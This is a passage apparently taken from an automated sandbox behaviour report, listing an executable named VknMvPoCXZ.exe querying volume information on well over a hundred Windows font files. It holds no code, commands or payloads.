                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
